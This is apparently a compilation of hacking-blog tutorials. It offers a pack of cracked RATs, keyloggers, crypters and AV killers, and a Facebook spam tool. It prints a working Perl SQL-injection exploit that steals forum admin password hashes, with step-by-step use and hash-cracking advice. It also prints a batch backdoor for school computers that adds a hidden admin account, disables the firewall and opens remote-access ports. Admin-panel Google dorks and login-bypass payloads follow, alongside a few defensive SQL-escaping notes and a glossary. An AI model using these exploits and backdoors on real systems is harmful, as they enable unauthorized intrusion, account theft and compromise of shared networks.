Download Hack Pack! 33 Hacking Tools | Only 53 MB

Well, I’ve gained a lot of tools , so I decided it’d be a good idea to give some of it back to the community. I’ve made this pack which contains most of my hacking tools collection (though not all Non). There’s 33 (or more) tools in here.

KEYLOGGERS & PASSWORD STEALING:
- Ardamax 2.8
- Ardamax 3.0
- Fake Messenger w/ password retriever (Revenge Messenger)
- Silent Keylogger by BUNNN
- Digital Keylogger v3.3
- Infinity YouTube cracker (doesn’t work according to many but its still present)
CRYPTERS AND BINDERS:
- File Joiner v2.01
- File Injector v3
- Xeus Technologies HotFusion binder
- Japabrz’s Csharp crypter
- Daemon Crypt V2
- Crypter v1.2
- nBinder v5.5 premium
- Easy Binder v2
- Shell Labs Icon Changer
- ShockLabs file binder
- uBinder v1.30 SE (someone’s private binder, it is almost FUD)
FREEZERS & BOMBERS:
- Frozen Land MSN Freezer v1
- Facebook Freezer
- Hotmail Lockers
- Email Bomber (an HTML page, no exe required!)
RATS:
- Beast v2.07
- BitFrost v1.2
- Dark Moon v4.11
- Lost Door v2.2 Stable public edition
- MiniMo v0.7 public beta
- Nuclear RAT v2.1.0
- Optix v1.33
- PaiN RAT 0.1 beta 9
- Poison Ivy v2.3.2
- Shark 3
- Spy-Net v.1.7
- Y3 RAT v2.5 RC 10
OTHERS:
- Proxy Switch v3.9 Ultimate
- Savk AV Killers (all 5 safe and deadly versions)
- Ardamax keylogger remover
NOTE: All software is full and cracks/serials are included, there are no trials or demos.
SAFETY: It would be best to run all these tools either Sandboxed, or from a Virtual Machine.
DOWNLOAD

Stop Hackers Before They Attack your website,avoiding SQL Injection

Summary of tutorial: I) Presentation of the problem. => The variables containing strings II)Security .
=> Explanation
=> Numeric variables
.Method 1
.Method 2
——————————————————————–
I) Presentation of the problem.
___________________________
There are two types of SQL injection:
* Injection into the variables that contain strings;
* Injection into numeric variables.
These are two very different types and to avoid them, it will act
differently for each of these types.
######################
The variables containing strings:
######################
Imagine a PHP script that fetches the age of a member according to its
nickname. This nickname has gone from one page to another via the URL
(by $ _GET what: p). This script should look like this:
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++​++++++++++++++++++
…
$pseudo = $_GET['pseudo'];
$requete = mysql_query(“SELECT age FROM membres WHERE pseudo=’$pseudo’”);
…
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++​++++++++++++++++++
Well keep you well, this script is a big SQL injection vulnerability.
Suffice it to a bad boy putting in place the username in the URL a query
like this:
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++​++++++++++++++++++
‘ UNION SELECT password FROM membres WHERE id=1
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++​++++++++++++++++++
It is to arrive to show (just an example), for example the password for
the member with the id 1. I will not explain in detail the operation for
fear that someone is not nice to walk around. Well, so let us go to the
security.
II) Security .
_______________
To secure this type of injection is simple. You use the function
mysql_real_escape_string ().
######################
Uh … It does what it?
######################
This feature adds the “\” character to the following characters:
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++​++++++++++++++++++
NULL, \ x00, \ n, \ r, \, ‘, “and \ X1A
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++​++++++++++++++++++
######################
And what’s the point?
######################
As you have noticed in previous injection, the attacker uses the quote
(to close the ‘around $ nick): if she is prevented from doing that, the
bad boy will only have to look elsewhere . This means that if one
applies a mysql_real_escape_string () to the variable name like this …
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++​++++++++++++++++++
…
$pseudo = mysql_real_escape_string($_GET['pseudo']);
$requete = mysql_query(“SELECT age FROM membres WHERE pseudo=’$pseudo’”);
…
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++​++++++++++++++++++
The application is completely secure.
Explanation
######################
Injection hacker to recall:
######################
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++​++++++++++++++++++
‘ UNION SELECT password FROM membres WHERE id=1
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++​++++++++++++++++++
Well if we apply mysql_real_escape_string () to the variable $ name used
in the query is what will the injection:
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++​++++++++++++++++++
\’ UNION SELECT password FROM membres WHERE id=1
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++​++++++++++++++++++
This means that we do not even come out of assessments around $ nick in
the request because the \ has been added. There is another function
somewhat similar to mysql_real_escape_string () is addslashes (), why
not have used? Well recently, a security hole was discovered on this if
it is used on a PHP 4.3.9 installation with magic_quotes_gpc enabled.
######################
Numeric variables:
######################
This type of injection is less known than the previous one, making it
more frequent, and it starts as just now with an example. This time, it
displays the age of a member according to its id, and by passing it by a
form ($ _POST) to change:
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++​++++++++++++++++++
…
$id = $_POST['id'];
$requete = mysql_query(“SELECT age FROM membres WHERE id=$id”);
…
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++​++++++++++++++++++
mysql_real_escape_string () would be nothing here, since if an attacker
wants to inject SQL code, it will not need to use quotes, because the
variable $ id is not surrounded by quotes. Simple example of
exploitation:
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++​++++++++++++++++++
2 UNION SELECT password FROM membres WHERE id=1
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++​++++++++++++++++++
This injection did exactly the same as the previous one, except that
here, to avoid it, there are two solutions:
* Change the contents of the variable so it contains only numbers;
* Check if the variable actually contains a number before using it in a query.
##########
Method 1:
##########
We’ll use a function , intval () This function returns regardless of the
contents of a variable its numerical value. For example:
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++​++++++++++++++++++
$variable = ’1e10′; // $variable vaut ’1e10′
$valeur_numerique = intval($variable); // $valeur_numerique vaut 1
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++​++++++++++++++++++
Now back to our sheep:
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++​++++++++++++++++++
$id = intval($_POST['id']);
$requete = mysql_query(“SELECT age FROM membres WHERE id=$id”);
}
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++​++++++++++++++++++
That is: you can stop there and is more than enough, but I recommend you
continue to find another method, or you have air beast if you find this
method on a code that is not yours without understand it.
############
Méthode 2:
###########
Here we use a function that returns TRUE when a variable contains only
numbers and FALSE if it is not the case this function is is_numeric (),
we will use it in a condition that checks whether is_numeric ( ) returns
TRUE well.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++​++++++++++++++++++
$id = $_POST['id'];
if (is_numeric($id))
{
$requete = mysql_query(“SELECT age FROM membres WHERE id=$id”);
}
else
{
echo “Trying to hack me ? MOTHA FUCKAH xD”;
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++​++++++++++++++++++
##################################################################
What is the best, depending intval () and is_numeric ()?
##################################################################
Well I will say that they are both equally effective, they are equal.
But I prefer inval () since with is_numeric () write more code, and if
the variable does not contain only numbers, the request is canceled (in
principle, but of course you can run the same query by choosing an
default value for the variable used). Well that’s it! You know all about
securing your applications. If you apply these methods, there is
absolutely no risk of having a fault type SQL injection on its website
(or PHP).

Facebook Hacker to Hack Facebook Accounts

Facebook Hacker is a multi-functional software used to hack facebook account. Actually, you can’t hack facebook password, but yes, cause many nuisance and pranks by using this Facebook Hacker software.
1. First of all Download Facebook Hacker software.
2. Now, run Facebook Hacker.exe file to see:

Login to your Facebook account and then hit on OK at right bottom.
3. Now, Facebook Hacker options are displayed as shown:

4. In Victim pane at left bottom, enter the facebook ID of the victim you wanna hack in User ID field.
5. Now, using this Facebook Hacker software you can:
Flood wall of victim.
Spam his message box.
Comment on him like crazy.
Poke him and even add mass likes.
Thus, you can play such pranks with your friends using this Facebook Hacker. So, free download Facebook Hacker and trick out your friends.
That’s all. Hope you will enjoy using this tool. I have tried this Facebook hacker software and found working perfect for me.

Ultimate Google hack Way

Look for Appz in Parent Directory
intext:”parent directory” intext:”[EXE]”
intext:”parent directory” index of:”[EXE]”
intext:”parent directory” index of:”[RAR]”
This will look for any exe or optionaly for zip, rar, ace, iso, bin and etc.
Look for Moviez in Parent Directory
intext:”parent directory” intext:”[VID]”
intext:”parent directory” index of:”[VID]”
This will look for any video filetype in parent directory. You can optionaly add index:”xvid” or intext:”divx” for specific codec movie.
Look for Muzik in Parent Directory
intext:”parent directory” intext:”[MP3]”
intext:”parent directory” index of:”[MP3]”
This will look for any music files.
Look for Gamez in Parent Directory
intext:”parent directory” index of:”[Gamez]“

How to Hack into forums

This is what you like to call “Hacking a forum”.
I call it “Cracking into a forum” … Learn what hacking means you lazy fucks, lol…
PS: I am hacking a forum slowly, everything i am doing now, is posted here by steps :
First of all, what you need is a forum to hack. For the sake of this tutorial, and for the safety of a specific site, I will not release the URL of the site that I will be hacking in this. I will be refering to it as “hackingsite”.
So you’ve got your target. You know the forum to want to hack, but how? Let’s find the user we want to hack. Typically, you’d want to hack the admin. The administrator is usually the first member, therefore his/her User ID will be “1″. Find the User ID of the administrator, or person you wish to hack. For this tutorial, let’s say his/her ID is “2″.
Got it? Well, now we are almost all set. So far, we know the site we wish to hack, and the member we wish to hack. In this case, we are hacking the administrator of “hackingsite”, which is User ID “2″.
Now we need a nice exploit. I preferably, for 1.3.1 forums, use one that is in common circulation around these forums. For those who don’t have it, here:

Code:

#!/usr/bin/perl -w
################################################## ################
# This one actually works http://www.quantriweb.com/forum/images/smilies/smile.gif Just paste the outputted cookie into
# your request header using livehttpheaders or something and you
# will probably be logged in as that user. No need to decrypt it!
# Exploit coded by “ReMuSOMeGa & Nova” and http://remusomega.com (http://remusomega.com/)
################################################## ################
use LWP::UserAgent;
$ua = new LWP::UserAgent;
$ua->agent(“Mosiac 1.0″ . $ua->agent);
if (!$ARGV[0]) {$ARGV[0] = ”;}
if (!$ARGV[3]) {$ARGV[3] = ”;}
my $path = $ARGV[0] . ‘/index.php?act=Login&CODE=autologin’;
my $user = $ARGV[1]; # userid to jack
my $iver = $ARGV[2]; # version 1 or 2
my $cpre = $ARGV[3]; # cookie prefix
my $dbug = $ARGV[4]; # debug?
if (!$ARGV[2])
{
print “..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org (http://forums.site.org/) [id] [ver 1/2].\n\n”;
exit;
}
my @charset = (“0″,”1″,”2″,”3″,”4″,”5″,”6″,”7″,”8″,”9″,”a”,”b”,”c”,”d”,”e”,”f”);
my $outputs = ”;
for( $i=1; $i < 33; $i++ )
{
for( $j=0; $j < 16; $j++ )
{
my $current = $charset[$j];
my $sql = ( $iver < 2 ) ?
“99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2 527$current%2527)/*” :
“99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i ,1)%3d%2527$current%2527)/*”;
my @cookie = (‘Cookie’ => $cpre . “member_id=31337420; ” . $cpre . “pass_hash=” . $sql);
my $res = $ua->get($path, @cookie);
# If we get a valid sql request then this
# does not appear anywhere in the sources
$pattern = ”;
$_ = $res->content;
if ($dbug) { print };
if ( !(/$pattern/) )
{
$outputs .= $current;
print “$current\n”;
last;
}
}
if ( length($outputs) < 1 ) { print “Not Exploitable!\n”; exit; }
}
print “Cookie: ” . $cpre . “member_id=” . $user . “;” . $cpre . “pass_hash=” . $outputs;
exit;

What the [love],Pretty confused, aren’t you? What the [love] are you supposed to do with this shit?! I’ll tell you. First of all, this is a Perl script. Copy and paste that code into Notepad.
How can you execute Perl scripts? Well, you can upload them to your CGI-BIN, or you can take my route of preference, and install Perl on your PC.
Your going to want to go and get ActivePerl. I am sure it’s here somewhere in Appz.
Open the file up, and let it install. Leave everything on default. In otherwords, just keep hitting “OK”.
So now you have Perl installed. Open up “My Computer”, and then click on “Local Disk (C:/)”. In there, you should see a folder named “Perl”. Open up that folder, and within “Perl”, you should see another folder named “bin”. Open up “bin”. Now that your in, drag and drop “ipb.pl” from your desktop, into “bin”.
Alrighty. Now everything is fine, and you’re ready to Pwn some FAGS …
What your going to want to do now, is open up your command prompt. If you don’t know how, please quit this site, and die…. Start – Run – CMD
Alright, so now your in your command prompt. You want to change the directory in your command prompt to your Perl/bin directory. To do this, type the following into your command prompt, and hit enter:
cd C:\Perl\bin
Good job. Your very, very close to being finished. Now that you are in the Perl/bin directory, we need to access the ipb.pl file. How do we do this? Type the following command into your command prompt:
perl ipb.pl
So, this is what we need to do. Type the following command into your command prompt:
ipb.pl http://hackingsite.com/forum 2 1
Obviously replace “http://hackingsite.com/forum” with the URL to the forum you wish to hack.
Now, this may take a minute. The exploit is gathering information, and grabbing the hash. Numbers/letters will slowly appear down the screen. Don’t be alarmed, and allow the program a few minutes. Once the hash grabbing is complete, it will return a full hash, as well as User ID.
Now you have the hash. In our case, the hash is: 4114d9d3061dd2a41d2c64f4d2bb1a7f
But what can we do with this hash? To you, it just looks like a scramble of numbers and letters. What this is, is an MD5 hash. This is the person’s password, encrypted using the MD5 algorthrim. I urge you to do a quick read-up on MD5 hash’s before continuing reading.
Done? You understand the very basics of MD5s? Good. You’re probably thinking: I just read that MD5 hashes cannot be cracked!
LOL.. Indeed, MD5s are impossible to reverse. Once a string is MD5ed, there is no way to get it back to plain-text. It is IMPOSSIBLE to decrypt an MD5 hash. But.. It is NOT impossible to CRACK an MD5 hash.
There are many places online where you can enter hashes to be cracked. Personally, I use “Cain & Able”, which is a great MD5 cracker availiable at ‘http://odix.it’.
You can use any method, and any crackers to crack this hash. 90% of the hashes I get, I am able to crack. Once you crack the hash, you will be given a plain-text password.
CONGRATS! You now have the victims password! You can now login to his/her account on whatever forum you were hacking. Hell, you could even try that password on his/her e-mail or MSN/AIM account. SureFire bro, [love] them up
But what if the hash is not crackable? You are merely left with a password hash. What can you do with this?
Well, you can spoof your cookie!
If you would like to learn more on spoofing cookies, use the friendly searching site they call “GOOGLE”
Good luck!

Hacking Password Protected Website

There are many ways to defeat java-script protected websites. Some are very simplistic, such as hitting
[ctl-alt-del ]when the password box is displayed, to simply turning off java capability, which will dump you into the default page.You can try manually searching for other directories, by typing the directory name into the url address box of your browser, ie: you want access to http://www.target.com .
Try typing http://www.target.com/images .(almost every web site has an images directory) This will put you into the images directory,and give you a text list of all the images located there. Often, the title of an image will give you a clue to the name of another directory. ie: in http://www.target.com/images,there is a .gif named gamestitle.gif . There is a good chance then, that there is a ‘games’ directory on the site,so you would then type in http://www.target.com/games, and if it is valid directory, you again get a text listing of all the files available there.
For a more automated approach, use a program like WEB SNAKE from anawave, or Web Wacker. These programs will create a mirror image of an entire web site, showing all director ies,or even mirror a complete server. They are indispensable for locating hidden files and directories.What do you do if you can’t get past an opening “PasswordRequired” box? . First do an WHOIS Lookup for the site. In our example, http://www.target.com . We find it’s hosted by http://www.host.com at 100.100.100.1.
We then go to 100.100.100.1, and then launch \Web Snake, and mirror the entire server. Set Web Snake to NOT download anything over about 20K. (not many HTML pages are bigger than this) This speeds things up some, and keeps you from getting a lot of files and images you don’t care about. This can take a long time, so consider running it right before bed time. Once you have an image of the entire server, you look through the directories listed, and find /target. When we open that directory, we find its contents, and all of its sub-directories listed. Let’s say we find /target/games/zip/zipindex.html . This would be the index page that would be displayed had you gone through the password procedure, and allowed it to redirect you here.By simply typing in the url http://www.target.com/games/zip/zipindex.html you will be onthe index page and ready to follow the links for downloading.

Hack the admin panel google will help you.

May be you’ll got the not that much of result but the google dork is still working enjoy copy and past it. Created by NilBD
“inurl:admin/addproduct.asp”
“inurl:admin/user.asp”
“inurl:admin/addpage.php”
“inurl:admin/gallery.asp”
“inurl:admin/image.asp”
“inurl:admin/adminuser.asp”
“inurl:admin/productadd.asp”
“inurl:admin/addadmin.asp”
“inurl:admin/add_admin.asp”
“inurl:admin/add_admin.php”
“inurl:admin/addnews.asp”
“inurl:admin/addpost”
inurl”inurl:admin/addforum.???”
“inurl:admin/addgame.???”
“inurl:admin/addblog.????”
“inurl:admin/admin_detail.php”
“inurl:admin/admin_area.php”
“inurl:admin/product_add.php”
“inurl:admin/additem.php”
“inurl:admin/addstore.php”
“inurl:admin/add_Products.???”
“inurl:admin/showbook.???”
“inurl:admin/selectitem.???”
“allinurl:admin/addfile.???”
“inurl:admin/addarticle.asp”
“inurl:admin/addfile.asp”
“inurl:admin/upload.php”
“inurl:admin/upload.asp”
“inurl:admin/addstory.php”
“inurl:admin/addshow.php”
“inurl:admin/addmember.asp”
“inurl:admin/addinfo.asp”
“inurl:admin/addcat.asp”
“inurl:admin/cp.asp”
“inurl:admin/productshow.asp”
“inurl:admin/addjob.asp”
“inurl:admin/addjob.???”
“inurl:admin/addpic.???”
“inurl:admin/viewproduct.???”
“inurl:admin/addaccount.php”
“inurl:admin/manage.php”
“inurl:admin/addcontact.???”
“inurl:admin/viewmanager.???”
“inurl:admin/addschool.???”
“inurl:admin/addproject.???”
“inurl:admin/addsale.???”
“inurl:admin/addcompany.???”
“inurl:admin/payment.???”
“inurl:user/emp.???”
“inurl:admin/addmovie.???”
“inurl:admin/addpassword.???”
“inurl:admin/addemployee.???”
“inurl:admin/addcat.???”
“inurl:admin/admin.???”
“inurl:admin/admincp.???”
“inurl:admin/settings.???”
“inurl:admin/addstate.???”
“inurl:admin/addcountry.???”
“inurl:admin/addmedia.???”
“inurl:admin/addcode.???”
“inurl:admin/addlinks.???”
“inurl:admin/addcity.???”

Network Hacking(port scanning)

Port Scanning :- Port scanning is carried out to determine a list of open ports on the remote host that have certain services or daemons running. In port scanning, the attacker connects to various TCP and UDP ports and tries to determine which ports are in listening mode.
1.TCP Ports Scanning:- Almost all port scans are based on the client sending a packet containing a particular flag to the target port of the remote system to determine whether the port is open. Following table lists the type of flags a TCP packet header can contain.
URG (urgent): This flag tells the receiver that the datapointed at by the urgent pointer required urgently.
ACK (acknowledgment):This flag is turned on whenever sender wants to acknowledge the receipt of all data send by the receiving end.
PSH (push):The data must be passed on to the application as soon as
possible.
RST (reset):There has been a problem with the connection and one wants to reset the connection with another.
SYN (synchronize):If system X wants to establish TCP connection with system Y, then it sends it’s own sequence number to Y, requesting that a connection be established. Such apacket is known as synchronize sequence numbers or SYN packet.
FIN (finish):If system X has finished sending all data packets and wants to end the TCP/IP connection that it has established with Y, then it sends a packet with a FIN flag to system Y.
A typical TCP/IP three way handshake can be described as follows :
1) The client sends a SYN packet to the server.
2) The server replies with a SYN packet and acknowledges the client’s SYN packet by sending an ACK packet.
3) The client acknowledges the SYN sent by the server.
Different techniques of TCP port scanning are :-
1) TCP connect port scanning
2) TCP SYN scanning (half open scanning)
3) SYN/ACK scanning
4) TCP FIN scanning
5) TCP NULL scanning
6) TCP Xmas tree scanning
2. UDP Ports Scanning :- In UDP port scanning, aUDP packet is sent to each port on the target host one by one.
If the remote port is closed, then the server replies with a Port Unreachable ICMP error message. If the port is open then no such error message is generated.
3.FTP Bounce Port Scanning :- The FTP bounce port scanning technique was discovered by Hobbit. He revealed a very interesting loophole in the FTP protocol that allowed users connected to the FTP service of a particular system to connect to any port of another system. This loophole allows anonymous port scanning.

How to hack your school network

This tutorial is for those newbies out there, wanting to “hack” their school. I’m gonna start by saying, if your going to hack the school, theres a high probability your get caught, and don’t do anything dumb like deleting the network. Its lame, and you will get flamed for doing it. This hack will allow you to take control of the PC’s at school. Lets start:
How to take control of the PC’s at school:
Here are the steps;
Preparing The Virus
Setting Up The Virus
Controlling The PC
Obviously, if you gonna take control over your school PC you need a virus. You have 2 methods:
1.The virus I made which is harmless and you won’t even notice it was executed.
2.Dropping a Trojan on the school PC.
Method 1
What you need:
Pen Drive (You can buy one, or you just use yours)
Brain (You can’t buy this)
Now, open notepad and copy/paste this code:

Code:

@echo off
REM ......: Created By Jigsaw :......
REM ......: HackPcOnline.Com :...... REM EDIT THESE SETTINGS
set username=USERNAME
set password=PASSWORD
set rdport=3389
set tnport=23
set rport=CHANGE_THIS
REM END EDITING SETTINGS
REM Adding The Backdoor
net user %username% %password% /add
REM Pause For Process
ping localhost -n 2 >nul
REM Adding Admin Access The Backdoor
net localgroup Administrators %username% /add
REM Hiding The Backdoor From Start Menu
REG add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /%username% /t REG_DWORD /d 0 /f >nul
REM Enabling Terminal Service
REG add HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0
REM Share C:\
net share system=C:\ /unlimited
REM Stealing The IP Stuff
ipconfig /all >> C:\attach.txt
REM Deleting The Firewall Configuration
netsh firewall delete
REM Opening Ports
netsh firewall add portopening TCP %rdport% "WinSvcService"
netsh firewall add portopening TCP %tnport2% "WinSvcService"
netsh firewall add portopening TCP %rport% "WinSvcService"
cls
exit

Save the file as something.bat (you can change something to whatever you want). In “Save as type:” choose “All Files”.

I strongly recommend you not to change the rdport and tnport configuration. The rdport will open the remote desktop default port, and the tnport will open the telnet’s client default port.
You can change the username, password and the rport (randomn port you choose to be opened)
At ipconfig /all >> C:\attach.txt you must change C:/ by your pen drive letter.
Save it and remove your pen drive.
Take your pen drive to school and run the bat file. Don’t forget the pc you runned it in cause you might need it.
When you get home go to your pc and try to telnet them or remote desktop the PC.
Method 2
In this method we will use a Trojan to control the school PC.
A tutorial on that will be posted
Now just create a server (which will be expalined in the tutorial), bind it and put it into your pen drive. Make sure you leave your PC turned on.
Then go to your school and drop the trojan.
Other way to do this is to give your trojan to a friend and tell him to stay in school. When you arrive home, send him a SMS and tell him to drop the trojan. This way you could even see if it worked.
After this you can probably do whatever you want with the PC.

Hacking through command prompt

Hacking through command prompt

Ok the first code is to see all the users on the computer
the second will change the password of any user (including the admin) note: unless using a network command line interface eg. Powershell it will only change the individual computers admins password which is still pretty useful
the next adds a new using to the comp
you guessed it, this one deletes a user
and this one adds a user to a localgroup Blocks of code should be set as style “Formatted” like this.
Code:
net user
net user (username) * [note: just start typing the new password you wont, no writting will come up though just hit enter when ur done]
net user (username) /add
net user (username) /del
net localgroup (localgroup eg.administrators) (username) /add

Common Hacking Terms

Computer hacking is becoming increasingly common these days. While black hat hackers may be involved in malicious activities like identity theft or the creation of Trojan Horses, some hackers just hack for heck of it.
You have to be smart to protect yourself from hackers. Make sure your computer is properly protected. There are many programs that will do this for you, but you can do it yourself as well if you learn how. Do not download anything unless you absolutely trust the source and configure your computer so that its security settings are tight. Install a firewall to protect it as well. Another thing you can do is to learn the common terms that hackers use. Knowing these terms will help you understand how hacking works and how to protect yourself from it.
• Back door – a hole deliberately placed by designers into a security system. Hackers use back doors to get into a system.
• Bit bucket – the universal data dump. Lost, deleted, or destroyed data ends up here.
• Black hat – a criminal hacker who causes damage and breaks the law by hacking.
• Cracker – someone who breaks into a security system. Many hackers separate themselves from crackers because crackers are often tied to organized crime rings.
• Daisy-chaining – process where a hacker gains entry into a computer or network and then uses it to gain access to another.
• Deep magic – a special technique central to a program.
• Hacker – a person who is able to break into a computer’s system without permission.
• Hacking run – a hacking session that lasts in an excess of eight to ten hours.
• Foo – term used as a sample name for programs and files.
• Gray hat – a hacker who sometimes hacks illegally and sometimes hacks “legally”.
• KISS Principle – acronym for “Keep It Simple Stupid,” used to control development complexity by hackers.
• Kluge – a clever programming trick that works for the wrong reason.
• Lots of MIPS but no I/O – describes a system that has a lot of processing power, but a bottlenecked input/output.
• Munge – a rewrite of a routine, data structure, or whole program.
• Netiquette – the standards of politeness across the internet; not often observed by hackers.
• Phreaking – the science of cracking a phone network.
• Script kiddie – a “copycat hacker” who copies other hacker’s techniques without creating anything of their own.
• Security through obscurity – hacker term for a common way of dealing with security holes where they are ignored and not documented with the hope nobody finds them.
• Sneaker – an individual hired to break into places with the purpose of testing their security.
• Spaghetti code – code that has a complex and tangled control structure.
• Time bomb – program that is set to trigger once certain conditions are reached.
• Trojan horse – program that disguises itself as one thing but once inside a computer, it actually does something else. Most often, they are damaging (viruses), but not all are.
• White hat – a hacker who is considered “nice” i.e. when he hacks, he informs the owner he has done it.
• Vaporware – term used by hackers referring to products released in advance of their official release date.
• Wetware – phrase referring to humans on the other end of a computer system.
• Virus – a self-replicating program that inserts itself into computer systems and causes damage.
• Voodoo programming – the use by guess of an obscure system that someone doesn’t really understand; i.e., whether it works or doesn’t work, the user has no real idea why.
• Vulcan nerve pinch – a keyboard combination that forces a soft-boot.
• Wedged – a point where a system is stuck; different from a crash, where the system is nonfunctioning.
• Wizard – person who completely understands how a program or process works.

How to Decrypt Passwords

As I have seen a lot of people unable to decrypt simple RAR passwords when the types of encryption has been given to them and the order of encryption has also been given, its a tutorial to stop all those saying “PLZ PASSWORD”. In this tut you will learn how to decrypt passwords encrypted by users to prevent download unnecessary download files.
-
Tutorial :-
Example
Password: tutorial
Code: +I9Mw+Ng/yTv7IY961YV=MXX
Encrypted by GILA7, ATOM-128 & TIGO-3FX
1) Find out what types of encryption are used, in our example you can seen the password was encrypted firstly by GILA7 then ATOM-128 and finally TIGO-3FX.
So, we will first have to decrypt it by TIGO-3FX, as this was the last encryption, then the second last, which is ATOM-128 and finally GILA7
means last encryption = first decryption ;]
-
2)Visit http://www.crypo.com/eng_tigo3fxd.php (is for TIGO-3FX),
then type the password +I9Mw+Ng/yTv7IY961YV=MXX in and press decrypt, you should get Sk01LgHNKkhle8Ho
3) Now, go to http://www.crypo.com/eng_atom128d.php (FOR ATOM- 128)
and type Sk01LgHNKkhle8Ho and press decrypt , we should get 3WAeExcQv85G
4) Finally, we will decrypt our last decryption code we got, 3WAeExcQv85G, with the GILA7 decrypter–> http://www.crypo.com/eng_gila7d.php ,
and we will get our password i.e :- tutorial

The Absolute Basics of Hacking

If you see all the text on this page, and are afraid, you’re not meant to be a hacker, quit now. Also, please know now that unlike in the movies, not everything is hackable. I will be writing about the basics of hacking servers; I will cover how to scan and/or exploit vulnerable daemons (services) running on the target server, and how to discover and/or exploit web-script vulnerabilities. You will need to know your way around a computer before reading this. And if you don’t know what a word means, Google or Wiki it!; if you don’t understand a concept, post here and I will try to clarify. Thanks for reading, hope this helps.
Recommended Tools
Port Scanner – nmap – http://nmap.org/
Browser – FireFox – http://firefox.com/
Daemon Vulnerabilities
Description
Daemons (also commonly known as services) are the processes that run on a computer that allow it to do things such as serve pages with the HTTP protocol, etc. (although they do not always necessarily interact over a network). Sometimes these daemons are poorly coded, which allows for an attacker to send some sort of input to them, and they either crash, or in worse cases, they run any code the attacker chooses.
Scanning For Vulnerabilites
Well, this is where a little common sense comes in, because we need to answer one question: Which ports to scan? Well, with a little googling, we’d know that the default port for the HTTPD (web daemon) is 80, for the FTPD it’s 21, etc. So if we wanted to know the version of the HTTPD running on the server, we’d run “nmap targetsite.com -p 80 -sV”. NOTICE the -sV argument; it is vital, otherwise nmap will just return whether or not the port is open, and won’t provide us with the daemon’s version. This is great and all, but we don’t want to just scan one port at a time do we? Well nmap has us covered there, so just scan multiple ports by seperating each target port with a comma (,) like so: “nmap targetsite.com -p 21,80 -sV”. However, if you don’t mind the scan taking a while longer, you can scan a range of ports like so: “nmap targetsite.com -p 1-1000 -sV”. This will scan all ports between 1 and 1000.
Checking For Vulnerability
After your scan has finished, nmap will display the open ports on your target, along with their version (if they were identifiable, usually they are). An example return would look like this: “80/tcp open http Apache httpd 2.0.32″. Taking this information, we search on milw0rm for “Apache”. After skimming through the results, we see that the target is vulnerable to this vulnerability, which when run on the target server will make it crash.
Using the Exploits
This varies, depending on the language that the exploit is coded in; google on how to do this, since it would just be wasting my time how to use all of the different languages here.
Common Web-Script Vulnerabilities
Description
In this section, I will be writing about vulnerabilities in a webserver’s server-sided code. Here are the topics I will be covering:
SQL Injection
XSS (Cross-Site Scripting)
RFI/LFI (Remote/Local File Include)
SQL Injection
Description
SQL injection is the act of injection your own, custom-crafted SQL commands into a web-script so that you can manipulate the database any way you want. Some example usages of SQL injection: Bypass login verification, add new admin account, lift passwords, lift credit-card details, etc.; you can access anything that’s in the database.
Example Vulnerable Code – login.php (PHP/MySQL)
Here’s an example of a vulnerable login code

PHP Code:

<?php
$user = $_POST['u'];
$pass = $_POST['p']; if (!isset($user) || !isset($pass)) {
echo("<form method=post><input type=text name=u value=Username><br /><input type=password name=p value=Password><br /><input type=submit value=Login></form>");
} else {
$sql = "SELECT `IP` FROM `users` WHERE `username`='$user' AND `password`='$pass'";
$ret = mysql_query($sql);
$ret = mysql_fetch_array($ret);
if ($ret[0] != "") {
echo("Welcome, $user.");
} else {
echo("Incorrect login details.");
}
}
?>

Basically what this code does, is take the username and password input, and takes the users’s IP from the database in order to check the validity of the username/password combo.

Testing Inputs For Vulnerability

Just throw an “‘” into the inputs, and see if it outputs an error; if so, it’s probably injectable. If it doesn’t display anything, it might be injectable, and if it is, you will be dealing with blind SQL injection which anyone can tell you is no fun. Else, it’s not injectable.
The Example Exploit
Let’s say we know the admin’s username is Administrator and we want into his account. Since the code doesn’t filter our input, we can insert anything we want into the statement, and just let ourselves in. To do this, we would simply put “Administrator” in the username box, and “‘ OR 1=1–” into the password box; the resulting SQL query to be run against the database would be “SELECT `IP` FROM `users` WHERE `username`=’Administrator’ AND `password=” OR 1=1–’”. Because of the “OR 1=1″, it will have the ability to ignore the password requirement, because as we all know, the logic of “OR” only requires one question to result in true for it to succeed, and since 1 always equals 1, it works; the “–” is the ‘comment out’ character for SQL which means it ignores everything after it, otherwise the last “‘” would ruin the syntax, and just cause the query to fail.
XSS (Cross-Site Scripting)
Description
